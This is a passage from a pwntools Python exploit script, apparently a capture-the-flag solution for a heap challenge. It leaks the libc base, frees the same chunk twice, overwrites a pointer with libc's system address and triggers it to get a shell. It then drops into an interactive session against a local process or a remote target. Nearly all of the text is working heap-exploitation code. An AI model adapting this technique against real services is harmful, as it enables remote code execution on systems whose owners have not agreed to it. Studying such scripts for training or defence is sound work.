    libc_base = leak - libc.sym['__malloc_hook'] - 976 - 0x10
    li('libc_base: ' + hex(libc_base))

    rm(1)
    rm(1)

    ad(0x10, p64(libc_base + libc.sym['system']), 0x30, '\x00') # 1
    #db()
    rd(1) # call system

def finish():
    """Hand the session to the user, then close the tube."""
    io.interactive()
    io.close()
#--------------------------main-----------------------------
if __name__ == '__main__':
    if not LOCAL:
        libc_path = './libc.so.6'  # remote: use the libc shipped with the challenge
    # The target ELF is needed in both modes, so load it once up front.
    elf = ELF(elf_path)
    if LOCAL:
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        parts = host.split(':')
        io = remote(parts[0], int(parts[1]))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()
